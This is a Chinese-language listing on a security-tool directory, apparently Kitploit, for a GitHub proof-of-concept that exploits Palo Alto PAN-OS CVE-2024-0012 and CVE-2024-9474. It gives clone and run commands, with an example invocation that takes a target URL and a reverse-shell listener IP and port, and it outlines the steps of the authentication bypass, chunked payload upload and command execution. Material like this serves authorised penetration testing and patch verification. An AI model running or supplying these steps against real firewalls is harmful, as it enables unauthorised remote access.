Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-0012_CVE-2024-9474_PoC — 此 PoC 针对 Palo Alto PAN-OS 中的漏洞,具体为 CVE-2024-0012 和 CVE-2024-9474。该脚本自动化了利用过程,包括载荷创建、分块传输以及无缝命令执行。 | Kitploit
工具/GitHubGitHub/talatumlabs/cve-2024-0012_cve-2024-9474_poc
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubtalatumlabs/cve-2024-0012_cve-2024-9474_poc

CVE-2024-0012_CVE-2024-9474_PoC

此 PoC 针对 Palo Alto PAN-OS 中的漏洞,具体为 CVE-2024-0012 和 CVE-2024-9474。该脚本自动化了利用过程,包括载荷创建、分块传输以及无缝命令执行。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
8521年前尚未审核

🚀 CVE-2024-0012 与 CVE-2024-9474(Palo Alto PAN-OS)漏洞利用 🔐

Palo Alto PAN-OS Exploit Type

🛡️ 描述

此概念验证(PoC)脚本针对 Palo Alto PAN-OS 中的漏洞,具体为 CVE-2024-0012 和 CVE-2024-9474,通过自动化利用过程,包括身份验证绕过、载荷生成、分块传输和无缝命令执行。

⚠️ 此脚本仅用于教育和授权的渗透测试目的。未经授权使用是非法的。


🔍 涉及的漏洞

CVE-2024-0012

  • 类型:身份验证绕过
  • 影响:允许未经授权访问管理界面。
  • 严重性:🚨 严重

CVE-2024-9474

  • 类型:命令执行与权限提升
  • 影响:允许远程攻击者执行任意命令。
  • 严重性:🔥 中等

🧑‍💻 使用方法

🛠️ 克隆仓库

root@kitploit:~
git clone https://github.com/TalatumLabs/CVE-2024-0012_CVE-2024-9474_PoC.git
cd CVE-2024-0012_CVE-2024-9474_PoC

🚀 运行脚本

root@kitploit:~
python -W ignore poc.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>

参数:

  • <TARGET_URL>:目标 URL,包含 http 或 https。
  • <LISTENER_IP>:你的反向 Shell 监听器 IP 地址。
  • <LISTENER_PORT>:反向 Shell 监听器的端口。

💡 示例

root@kitploit:~
python -W ignore poc.py https://target.pan-os-system.com 192.168.1.100 4444

💻 漏洞利用演示

https://github.com/user-attachments/assets/12ca7632-e5d2-488f-b644-6e278651a2f5


⚙️ 工作原理

从这篇 Medium 文章 获取此 PoC 的完整详解和技术分析!

  1. 🔍 检测漏洞:确保目标存在 CVE-2024-0012 和 CVE-2024-9474 漏洞。
  2. 🛡️ 提取 PHPSESSID:获取会话 ID 以进行后续利用。
  3. ✨ 生成载荷:创建双重编码的反向 Shell 载荷。
  4. 📦 上传分块:将载荷分块发送到目标服务器。
  5. 🔗 合并载荷:在目标系统上重新组装载荷。
  6. ⚡ 执行命令:解码并执行反向 Shell。

⚠️ 法律免责声明

此 PoC 仅用于教育目的和授权安全测试。严禁未经授权使用此工具。作者不对因使用此工具而造成的任何滥用或损害负责。


🧑‍🎓 作者

ghostxploiter

下载工具